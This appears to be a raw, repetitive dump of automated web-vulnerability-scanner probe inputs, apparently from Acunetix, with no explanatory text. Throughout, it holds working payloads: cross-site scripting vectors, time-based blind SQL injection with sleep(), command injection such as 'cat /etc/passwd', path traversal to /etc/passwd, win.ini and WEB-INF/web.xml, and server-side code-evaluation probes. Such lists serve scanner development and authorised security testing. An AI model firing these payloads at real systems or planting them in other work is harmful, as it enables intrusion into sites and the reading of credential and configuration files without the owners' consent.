response.write(9369777*9101843)

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(911405)"></g></svg>

WEB-INF\web.xml

&cat /etc/passwd&

1

'+response.write(9369777*9101843)+'

1

1

1<div style=width:expression(prompt(920029))>

'&cat /etc/passwd&'

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

"+response.write(9369777*9101843)+"

1

1<iframe src='data:text/html

"&cat /etc/passwd&"

1

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

1

SomeCustomInjectedHeader:injected_by_wvs

1<body onload=prompt(903144)>

../../../../../../../../../../etc/passwd

1

cat /etc/passwd

-1

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(983889)>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

`cat /etc/passwd`

1

-1)

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

1<img src=xyz OnErRor=prompt(943007)>

../../../../../../../../../../etc/passwd.jpg

|cat /etc/passwd#

1

-1))

1

${100089+99411}

1

1

1<img/src=">" onerror=alert(918541)>

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

8C1IK3jd'

'|'ld

1

1

1

1<ScRiPt%20>prompt(916473)</sCripT>

1&n974153=v977800

1

1some_inexistent_file_with_long_name%00.jpg

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

ckiSnDwO')

"|"ld

1

)

1&lt

1

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

/../..//../..//../..//../..//../..//etc/passwd.jpg

554hqa4D'))

1

!(()&&!|*|*|

<img acu onmouseover=prompt(939300) //>

http://testasp.vulnweb.com/t/xss.html?%00.jpg

testasp.vulnweb.com

.\./.\./.\./.\./.\./.\./etc/passwd

-1

'

1

'"()

^(#$!@#$)(()))******

1<input autofocus onfocus=prompt(912568)>

'

1

1

/etc/passwd

1

-1)

"

1

1

<a href='http://www.acunetix.com'>website security</a>

"

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

-1))

||cat /etc/passwd

1

1

1

[url=http://www.acunetix.com]website security[/url]

${@print(md5(acunetix_wvs_security_test))}

acunetix_wvs_invalid_filename

http://hitEEmcULhZWo.bxss.me/

&dir

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

5RbwbewP'

1

1

1

comments

1_wBkRt <ScRiPt >prompt(936001)</ScRiPt>

${@print(md5(acunetix_wvs_security_test))}\

1

................etc/passwd

'&dir&'

z6P7jZsP')

1

1

1

1

comments

"&dir&"

71CoRSLR'))

http://www.acunetix.tst

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

file:///etc/passwd

|dir

1

1

comments/.

1

1

1

1

'"

1

/\../\../\../\../\../\../\../etc/passwd

'|dir

1

1

1

1'"()&%<ScRiPt >prompt(984042)</ScRiPt>

<!--

1

1

WEB-INF/web.xml

"|dir

1

1

'"()&%<ScRiPt >prompt(986745)</ScRiPt>

1

1

1

WEB-INF\web.xml

1

1

1

1_947075

1

1

../../../../../../../../../../windows/win.ini

acu7333<s1﹥s2ʺs3ʹuca7333

1

1

1

1

../../../../../../../../../../boot.ini

acux4160z1z2abcxuca4160

1

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1<ScRiPt >prompt(942797)</ScRiPt>

1

1

1

windowswin.ini

1<script>prompt(904051)</script>

1

1

................windowswin.ini

1

1<ScRiPt >prompt(913009)</ScRiPt>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?915686></ScRiPt>

1

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

1

1<ScRiPt >prompt(966976)</ScRiPt>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1<video><source onerror="javascript:prompt(956772)">

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

response.write(9493220*9132383)

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(917935)"></g></svg>

1

1

'+response.write(9493220*9132383)+'

1

&cat /etc/passwd&

1<div style=width:expression(prompt(979663))>

1

1

"+response.write(9493220*9132383)+"

WEB-INF/web.xml

1

1<iframe src='data:text/html

SomeCustomInjectedHeader:injected_by_wvs

'&cat /etc/passwd&'

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

../../../../../../../../../../etc/passwd

1

1

1<body onload=prompt(990787)>

WEB-INF\web.xml

SomeCustomInjectedHeader:injected_by_wvs

1

"&cat /etc/passwd&"

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(946020)>

SomeCustomInjectedHeader:injected_by_wvs

1

cat /etc/passwd

1

../../../../../../../../../../etc/passwd.jpg

1

-1

1

1<img src=xyz OnErRor=prompt(905295)>

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

`cat /etc/passwd`

${100258+99134}

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

-1)

1<img/src=">" onerror=alert(921741)>

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

|cat /etc/passwd#

1&n963905=v928507

1some_inexistent_file_with_long_name%00.jpg

1

-1))

1<ScRiPt%20>prompt(963494)</sCripT>

)

1

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

'|'ld

Zz2BCbTR'

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1&lt

!(()&&!|*|*|

.\./.\./.\./.\./.\./.\./etc/passwd

1

"|"ld

http://testasp.vulnweb.com/t/xss.html?%00.jpg

'"()

7VFoRvu3')

<img acu onmouseover=prompt(989249) //>

'

^(#$!@#$)(()))******

testasp.vulnweb.com

/etc/passwd

1

1

1

1<input autofocus onfocus=prompt(930108)>

lZzbV8rd'))

"

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

'

1

1

1

-1

<a href='http://www.acunetix.com'>website security</a>

${@print(md5(acunetix_wvs_security_test))}

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

"

1

acunetix_wvs_invalid_filename

http://hitqsDvRbdbbQ.bxss.me/

[url=http://www.acunetix.com]website security[/url]

-1)

${@print(md5(acunetix_wvs_security_test))}\

1

................etc/passwd

1

||cat /etc/passwd

comments

1

1

-1))

1_AXbLV <ScRiPt >prompt(959057)</ScRiPt>

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

&dir

comments

1

1

yfGqcomH'

1

http://www.acunetix.tst

file:///etc/passwd

1

1

1

'&dir&'

comments/.

diIdI38k')

1

/\../\../\../\../\../\../\../etc/passwd

1

1

1

'"

1'"()&%<ScRiPt >prompt(974077)</ScRiPt>

1

"&dir&"

fOaLBK2a'))

WEB-INF/web.xml

1

1

1

<!--

'"()&%<ScRiPt >prompt(921181)</ScRiPt>

|dir

1

WEB-INF\web.xml

1

1

1

1

1_991108

1

'|dir

../../../../../../../../../../windows/win.ini

1

1

1

1

../../../../../../../../../../boot.ini

"|dir

acu10543<s1﹥s2ʺs3ʹuca10543

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

acux9465z1z2abcxuca9465

1

1

windowswin.ini

1<ScRiPt >prompt(957126)</ScRiPt>

1

1

1

................windowswin.ini

1

1

1<script>prompt(925233)</script>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<ScRiPt >prompt(947537)</ScRiPt>

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?978810></ScRiPt>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1<ScRiPt >prompt(975598)</ScRiPt>

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<video><source onerror="javascript:prompt(942939)">

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(925209)"></g></svg>

WEB-INF/web.xml

1

1

1<div style=width:expression(prompt(921200))>

response.write(9170095*9863712)

1

1

WEB-INF\web.xml

'+response.write(9170095*9863712)+'

&cat /etc/passwd&

1

1<iframe src='data:text/html

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

"+response.write(9170095*9863712)+"

'&cat /etc/passwd&'

1<body onload=prompt(971699)>

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1

SomeCustomInjectedHeader:injected_by_wvs

1

../../../../../../../../../../etc/passwd

1

"&cat /etc/passwd&"

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(968585)>

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

SomeCustomInjectedHeader:injected_by_wvs

1<img src=xyz OnErRor=prompt(906446)>

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

cat /etc/passwd

1

-1

1

1

1<img/src=">" onerror=alert(930594)>

1

../../../../../../../../../../etc/passwd.jpg

1

`cat /etc/passwd`

${100344+100327}

-1)

1

1

1<ScRiPt%20>prompt(964233)</sCripT>

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

|cat /etc/passwd#

1

1&n951578=v959150

-1))

1

1

1&lt

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1some_inexistent_file_with_long_name%00.jpg

'|'ld

JlBmQJaP'

)

1

1

<img acu onmouseover=prompt(922600) //>

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

"|"ld

.\./.\./.\./.\./.\./.\./etc/passwd

GFs7MLUp')

!(()&&!|*|*|

1<input autofocus onfocus=prompt(960522)>

1

'"()

testasp.vulnweb.com

http://testasp.vulnweb.com/t/xss.html?%00.jpg

/etc/passwd

<a href='http://www.acunetix.com'>website security</a>

pp5txk6h'))

^(#$!@#$)(()))******

1

'

1

1

'

1

[url=http://www.acunetix.com]website security[/url]

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

-1

1

"

1

1

1

1

"

1_EpaL5 <ScRiPt >prompt(953873)</ScRiPt>

-1)

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

${@print(md5(acunetix_wvs_security_test))}

http://hitszhO6iv2Yz.bxss.me/

1

1

acunetix_wvs_invalid_filename

||cat /etc/passwd

1

-1))

................etc/passwd

${@print(md5(acunetix_wvs_security_test))}\

1

1

1

h2HKDcxm'

1

1

&dir

comments

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

wzD7UUO5')

http://www.acunetix.tst

'&dir&'

comments

1

file:///etc/passwd

1

1

1

"&dir&"

'"

MpxRagvE'))

comments/.

1

1

/\../\../\../\../\../\../\../etc/passwd

1

1'"()&%<ScRiPt >prompt(953891)</ScRiPt>

|dir

<!--

1

1

1

1

WEB-INF/web.xml

'"()&%<ScRiPt >prompt(981325)</ScRiPt>

1

'|dir

1

1

1

1

WEB-INF\web.xml

1_948111

1

"|dir

1

1

1

../../../../../../../../../../windows/win.ini

acu6589<s1﹥s2ʺs3ʹuca6589

1

1

1

../../../../../../../../../../boot.ini

1

1

acux1174z1z2abcxuca1174

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1<ScRiPt >prompt(919551)</ScRiPt>

windowswin.ini

1

1

1

1<script>prompt(985330)</script>

1

................windowswin.ini

1

1<ScRiPt >prompt(903187)</ScRiPt>

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?961451></ScRiPt>

1

1

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

1<ScRiPt >prompt(928932)</ScRiPt>

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<video><source onerror="javascript:prompt(910602)">

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(983861)"></g></svg>

1

1

response.write(9965286*9508455)

1<div style=width:expression(prompt(952584))>

1

1

1

'+response.write(9965286*9508455)+'

WEB-INF/web.xml

1<iframe src='data:text/html

&cat /etc/passwd&

SomeCustomInjectedHeader:injected_by_wvs

1

"+response.write(9965286*9508455)+"

1

'&cat /etc/passwd&'

WEB-INF\web.xml

../../../../../../../../../../etc/passwd

1<body onload=prompt(966831)>

SomeCustomInjectedHeader:injected_by_wvs

1

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

"&cat /etc/passwd&"

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(966233)>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

SomeCustomInjectedHeader:injected_by_wvs

cat /etc/passwd

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

1

1

${99620+99151}

1<img src=xyz OnErRor=prompt(931337)>

../../../../../../../../../../etc/passwd.jpg

1

`cat /etc/passwd`

1

-1

1

1

1

1<img/src=">" onerror=alert(962858)>

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

|cat /etc/passwd#

-1)

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1&n970073=v936356

1<ScRiPt%20>prompt(985433)</sCripT>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

'|'ld

-1))

1

1some_inexistent_file_with_long_name%00.jpg

1

1

1&lt

/../..//../..//../..//../..//../..//etc/passwd.jpg

)

"|"ld

HvgjwOde'

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

<img acu onmouseover=prompt(942076) //>

!(()&&!|*|*|

.\./.\./.\./.\./.\./.\./etc/passwd

'"()

http://testasp.vulnweb.com/t/xss.html?%00.jpg

r6JlKSvr')

1

testasp.vulnweb.com

'

1<input autofocus onfocus=prompt(982524)>

^(#$!@#$)(()))******

/etc/passwd

'

1

1

Vg2fI1oW'))

1

1

"

<a href='http://www.acunetix.com'>website security</a>

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

"

1

-1

1

${@print(md5(acunetix_wvs_security_test))}

1

1

[url=http://www.acunetix.com]website security[/url]

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

||cat /etc/passwd

http://hitvXrC1dD6Ta.bxss.me/

-1)

acunetix_wvs_invalid_filename

${@print(md5(acunetix_wvs_security_test))}\

1

1

1_Mfptn <ScRiPt >prompt(990543)</ScRiPt>

&dir

1

................etc/passwd

1

comments

-1))

1

1

1

1

'&dir&'

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

n5w3UEvB'

comments

http://www.acunetix.tst

1

1

1

"&dir&"

1

file:///etc/passwd

1

hZz4Eact')

1

comments/.

1

1

'"

|dir

/\../\../\../\../\../\../\../etc/passwd

1

1'"()&%<ScRiPt >prompt(945533)</ScRiPt>

cYCm3oxc'))

1

1

<!--

1

'|dir

WEB-INF/web.xml

'"()&%<ScRiPt >prompt(902257)</ScRiPt>

1

1

1

1

1_957404

1

"|dir

WEB-INF\web.xml

1

1

1

1

../../../../../../../../../../windows/win.ini

1

1

1

acu1309<s1﹥s2ʺs3ʹuca1309

1

../../../../../../../../../../boot.ini

1

1

1

../../../../../../../../../../windows/win.ini.jpg

acux2602z1z2abcxuca2602

1

1

1

1

windowswin.ini

1<ScRiPt >prompt(998374)</ScRiPt>

1

................windowswin.ini

1

1

1<script>prompt(954595)</script>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<ScRiPt >prompt(933103)</ScRiPt>

1

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?957829></ScRiPt>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1<ScRiPt >prompt(997741)</ScRiPt>

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<video><source onerror="javascript:prompt(977386)">

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(961731)"></g></svg>

response.write(9551286*9512618)

1

WEB-INF/web.xml

1

1<div style=width:expression(prompt(909098))>

1

'+response.write(9551286*9512618)+'

1

1

WEB-INF\web.xml

&cat /etc/passwd&

1<iframe src='data:text/html

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

"+response.write(9551286*9512618)+"

1<body onload=prompt(998485)>

1

'&cat /etc/passwd&'

1

1

../../../../../../../../../../etc/passwd

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(989230)>

1

SomeCustomInjectedHeader:injected_by_wvs

1

"&cat /etc/passwd&"

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1<img src=xyz OnErRor=prompt(975210)>

1

SomeCustomInjectedHeader:injected_by_wvs

1

cat /etc/passwd

1

1

-1

../../../../../../../../../../etc/passwd.jpg

1<img/src=">" onerror=alert(923791)>

1

1

1

`cat /etc/passwd`

1

${100468+99458}

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

-1)

1<ScRiPt%20>prompt(974837)</sCripT>

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

|cat /etc/passwd#

1

1

1&n910420=v981161

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

-1))

1

1&lt

1some_inexistent_file_with_long_name%00.jpg

1

'|'ld

)

1

qbRsgtOh'

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

<img acu onmouseover=prompt(915309) //>

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

!(()&&!|*|*|

"|"ld

1

ZjruMGgD')

.\./.\./.\./.\./.\./.\./etc/passwd

testasp.vulnweb.com

'"()

1

1<input autofocus onfocus=prompt(946814)>

^(#$!@#$)(()))******

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

xTBTS4Ij'))

'

/etc/passwd

1

1

<a href='http://www.acunetix.com'>website security</a>

1

1

'

1

-1

[url=http://www.acunetix.com]website security[/url]

"

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

1

1

"

1

-1)

${@print(md5(acunetix_wvs_security_test))}

1_r3ZQB <ScRiPt >prompt(984659)</ScRiPt>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

http://hit7FqDVlspUx.bxss.me/

1

||cat /etc/passwd

1

${@print(md5(acunetix_wvs_security_test))}\

acunetix_wvs_invalid_filename

-1))

1

1

................etc/passwd

1

1

&dir

1

comments

1

MZyVIi9V'

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

http://www.acunetix.tst

1

comments

'&dir&'

1

1

F2r82JDB')

1

1

1

file:///etc/passwd

'"

"&dir&"

comments/.

1'"()&%<ScRiPt >prompt(915644)</ScRiPt>

1

tlPih4yr'))

1

/\../\../\../\../\../\../\../etc/passwd

<!--

|dir

1

'"()&%<ScRiPt >prompt(970288)</ScRiPt>

1

1

1

WEB-INF/web.xml

1

'|dir

1

1_936563

1

1

1

WEB-INF\web.xml

"|dir

1

1

acu10903<s1﹥s2ʺs3ʹuca10903

1

1

../../../../../../../../../../windows/win.ini

1

1

1

1

../../../../../../../../../../boot.ini

acux2169z1z2abcxuca2169

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1<ScRiPt >prompt(980944)</ScRiPt>

1

1

1

windowswin.ini

1<script>prompt(994636)</script>

1

1

1

1<ScRiPt >prompt(963062)</ScRiPt>

................windowswin.ini

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?976483></ScRiPt>

1

1

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

1<ScRiPt >prompt(995510)</ScRiPt>

1

1

1

1

1<video><source onerror="javascript:prompt(980796)">

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(936672)"></g></svg>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

response.write(9664114*9464204)

1

1

1<div style=width:expression(prompt(902846))>

1

'+response.write(9664114*9464204)+'

1

1<iframe src='data:text/html

&cat /etc/passwd&

1

WEB-INF/web.xml

1

../../../../../../../../../../etc/passwd

"+response.write(9664114*9464204)+"

SomeCustomInjectedHeader:injected_by_wvs

1

1<body onload=prompt(980245)>

'&cat /etc/passwd&'

WEB-INF\web.xml

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(948122)>

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

../../../../../../../../../../etc/passwd.jpg

1

SomeCustomInjectedHeader:injected_by_wvs

1

cat /etc/passwd

1<img src=xyz OnErRor=prompt(974267)>

1

-1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

${100266+99588}

1

1<img/src=">" onerror=alert(956033)>

1

`cat /etc/passwd`

1

-1)

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1<ScRiPt%20>prompt(985427)</sCripT>

1

|cat /etc/passwd#

1

-1))

1&n967582=v913441

/../..//../..//../..//../..//../..//etc/passwd.jpg

1some_inexistent_file_with_long_name%00.jpg

1

'|'ld

1&lt

1

1

<img acu onmouseover=prompt(982538) //>

6QhTztBL'

1

.\./.\./.\./.\./.\./.\./etc/passwd

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

"|"ld

)

testasp.vulnweb.com

1

1<input autofocus onfocus=prompt(954464)>

pOlsQ9CN')

/etc/passwd

1

!(()&&!|*|*|

^(#$!@#$)(()))******

1

1

<a href='http://www.acunetix.com'>website security</a>

2VM8Fmhw'))

'"()

'

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

'

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1

1

1

[url=http://www.acunetix.com]website security[/url]

-1

1

"

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

"

1

1

1

1_UAfzY <ScRiPt >prompt(912968)</ScRiPt>

1

-1)

1

${@print(md5(acunetix_wvs_security_test))}

................etc/passwd

||cat /etc/passwd

acunetix_wvs_invalid_filename

1

1

1

1

${@print(md5(acunetix_wvs_security_test))}\

-1))

http://hit8U6HZHf39L.bxss.me/

file:///etc/passwd

&dir

comments

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

YD9oELdK'

1

1

/\../\../\../\../\../\../\../etc/passwd

1

comments

'&dir&'

1

1

1

7GsiiRaA')

1

'"

WEB-INF/web.xml

http://www.acunetix.tst

"&dir&"

comments/.

1

1'"()&%<ScRiPt >prompt(929266)</ScRiPt>

fikM54R3'))

1

WEB-INF\web.xml

<!--

|dir

1

1

1

'"()&%<ScRiPt >prompt(996625)</ScRiPt>

1

../../../../../../../../../../windows/win.ini

1

'|dir

1

1

1

1_971206

../../../../../../../../../../boot.ini

1

1

"|dir

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

acu2120<s1﹥s2ʺs3ʹuca2120

windowswin.ini

1

1

1

acux2083z1z2abcxuca2083

1

................windowswin.ini

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<ScRiPt >prompt(915213)</ScRiPt>

1

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

1

1

1<script>prompt(913435)</script>

1

1

1<ScRiPt >prompt(918095)</ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?903472></ScRiPt>

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<ScRiPt >prompt(907262)</ScRiPt>

1

1

1

1

1<video><source onerror="javascript:prompt(940251)">

WEB-INF/web.xml

1

response.write(9776573*9184451)

1

WEB-INF\web.xml

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(989424)"></g></svg>

1

1

1

'+response.write(9776573*9184451)+'

1

1<div style=width:expression(prompt(986908))>

1

1

&cat /etc/passwd&

"+response.write(9776573*9184451)+"

1

1

SomeCustomInjectedHeader:injected_by_wvs

1<iframe src='data:text/html

1

1

'&cat /etc/passwd&'

1

1<body onload=prompt(981361)>

SomeCustomInjectedHeader:injected_by_wvs

1

../../../../../../../../../../etc/passwd

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

"&cat /etc/passwd&"

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(977419)>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

SomeCustomInjectedHeader:injected_by_wvs

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

cat /etc/passwd

1

1

1<img src=xyz OnErRor=prompt(966159)>

1

../../../../../../../../../../etc/passwd.jpg

1

-1

1

1

`cat /etc/passwd`

${100107+99364}

1<img/src=">" onerror=alert(991479)>

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1&n903008=v904800

-1)

1

1

|cat /etc/passwd#

1some_inexistent_file_with_long_name%00.jpg

1

1<ScRiPt%20>prompt(971917)</sCripT>

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

'|'ld

1

-1))

1

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

)

1&lt

/../..//../..//../..//../..//../..//etc/passwd.jpg

xgiNdiIv'

"|"ld

1

testasp.vulnweb.com

!(()&&!|*|*|

<img acu onmouseover=prompt(964688) //>

1

'"()

.\./.\./.\./.\./.\./.\./etc/passwd

'

epPF3fbQ')

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

^(#$!@#$)(()))******

1<input autofocus onfocus=prompt(936082)>

1

1

/etc/passwd

'

"

vP9AnofP'))

1

1

1

<a href='http://www.acunetix.com'>website security</a>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

-1

"

${@print(md5(acunetix_wvs_security_test))}

1

1

1

[url=http://www.acunetix.com]website security[/url]

1

http://hitFzdCrYEng6.bxss.me/

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

-1)

acunetix_wvs_invalid_filename

||cat /etc/passwd

${@print(md5(acunetix_wvs_security_test))}\

1

1

1_pNzfL <ScRiPt >prompt(975302)</ScRiPt>

1

1

................etc/passwd

1

-1))

comments

&dir

1

1

1

1

comments

http://www.acunetix.tst

tO80EMZM'

'&dir&'

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

1

file:///etc/passwd

1

comments/.

"&dir&"

mftMjfoB')

1

1

'"

1

1

/\../\../\../\../\../\../\../etc/passwd

1

1

1vCeMdIz'))

1'"()&%<ScRiPt >prompt(938061)</ScRiPt>

|dir

<!--

1

WEB-INF/web.xml

1

1

1

'"()&%<ScRiPt >prompt(957930)</ScRiPt>

'|dir

1

1

